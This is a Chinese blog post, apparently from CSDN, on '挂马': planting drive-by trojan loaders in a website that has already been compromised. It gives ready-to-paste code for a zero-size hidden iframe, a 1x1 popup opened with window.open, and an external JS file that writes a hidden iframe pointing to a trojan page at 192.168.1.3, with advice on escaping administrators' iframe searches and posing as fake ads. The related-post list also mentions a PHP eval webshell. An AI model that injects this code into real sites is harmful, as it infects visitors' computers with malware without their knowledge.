挂马方法

最新推荐文章于 2023-02-04 10:30:38 发布
最新推荐文章于 2023-02-04 10:30:38 发布
阅读量728 收藏 1
点赞数
分类专栏: 安全 文章标签: iframe javascript html flash file 测试
方法一:

一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 :
<html>
<iframe src=" http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank> http://192.168.1.3/inc/joke.htm。而_blank> http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。

方法二:

<SCRIPT language=javascript>
window.open(" http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。

方法三:

还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src=' http://192.168.1.3/inc/joke.htm' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............

方法四:
代码加进包含文件<!--#include file="conn.asp"-->
Happy_999
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详解网站挂马方法
11-21
详解网站挂马方法/教会你如何渗透网站挂马,抓肉鸡等
挂马攻击的介绍和防御
煜铭2011
10-08 2758
0x01 介绍 挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。 0x02 方式 目前挂马的主要方式是通过IFrame与Scr...
常见JS挂马方法及如何防止网站被黑客挂马
吸星大法--吸百家武学之精华。大成也
09-22 6946
最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定。可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因。最后发现是网站被挂马了,导致网站被连累了。在此,借助seo思维博客的平台,给大家简单的介绍下js挂马方法及如何防止网站被挂马。 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过
js常见挂马案例1
滴水石穿
03-03 339
一.案例案例1 var c = document.cookie; if (c.indexOf(‘isfirstvisited=false’) != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href
网页挂马及暗链检测
A11085013的专栏
06-09 7807
什么是网页挂马 网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”。 什么是SEO暗链 SEO暗链是SEO黑帽手法中相当普遍的一种手段。笼统地说,它就是指一些人用非正常的手段获取其他网站的权限后,修改其网站的源代码,加入指向自己网站的反向链接代码。其目的是优化自己网站中的一些关键字
挂马方法简介
Walter的专栏
11-26 2439
一:框架挂马 此处地址会直接访问,所以如果是链接到exe文件的下载地址,那就会提示用户下载,用户一旦点击就会下载执行被挂马。 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀 四:body挂马 五:隐蔽挂马 top.
基于HTTP会话过程跟踪的网页挂马攻击检测方法.ppt
06-20
基于HTTP会话过程跟踪的网页挂马攻击检测方法
预防网页挂马方法总结
09-01
以下是对预防网页挂马的详细方法的解析: 1. **理解网页挂马的工作原理**: - **目的**:黑客的目标是将木马植入用户的电脑,并使其执行,形成恶性循环,从而控制用户的设备。 - **实现方式**:常见手法是在网页...
wordpress网站被挂马以及防御方法
09-28
wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性
挂马方法大全
ccx_john的专栏
12-07 2525
一:框架挂马 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀 四:body挂马 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + '
教你如何反击令人防不胜防的JS挂马(图).php
02-05
教你如何反击令人防不胜防的JS挂马(图).php
网站挂马工具类
04-25
文件操作,数据库操作,开进程执行 上传,转移位置,最后修改时间,执行程序,读写文件,SQL数据库操作 查看数据库结构 服务器上的操作基本都能实现
JS文件挂马代码分析
08-27
JS文件挂马代码分析,可以看看,打开cookie.js文件后,发现其中多了如下代码: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,S
使用webshell工具对网站进行渗透测试
m0_71635484的博客
02-04 577
蚁剑、冰蝎对网站进行渗透实例
挂马方法和技巧详解
北冥
03-28 1773
(1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。(2) 再隐藏一点的就是js挂马了。  像再原来的网页中写入 ,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.b
js挂马分析及处理方法
白强
09-23 646
js挂马分析及处理方法 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。   1:网页挂马的种类.   目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。   卢松松以前做...
教你如何挂马
chenrongde的专栏
10-09 2030
教你如何挂马方法一: 一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 : 把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了,那width="0" height
基于DVWA文件上传,包含漏洞,上传一句话木马基础分析
Alexz__的博客
10-06 4703
木马 <?php @eval($_POST[value]); ?> 这是这个php程序,这个名字源于古希腊的传说这里就不说了,等于是一个别人家服务器在管理者不知情的情况下给你开了个后门你就可以在这里认真学习(放飞自我) 首先看eval函数: 在w3c里面找到的解释如下:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾...
怎么看网站被挂马的工具
最新发布
03-31
作为AI,我无法提供具体的工具,但是以下是一些检测网站是否被挂马方法: 1. 使用杀毒软件扫描:使用一款可靠的杀毒软件,对网站进行全面扫描,以查找是否存在恶意软件。 2. 检查网站的安全证书:如果网站拥有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值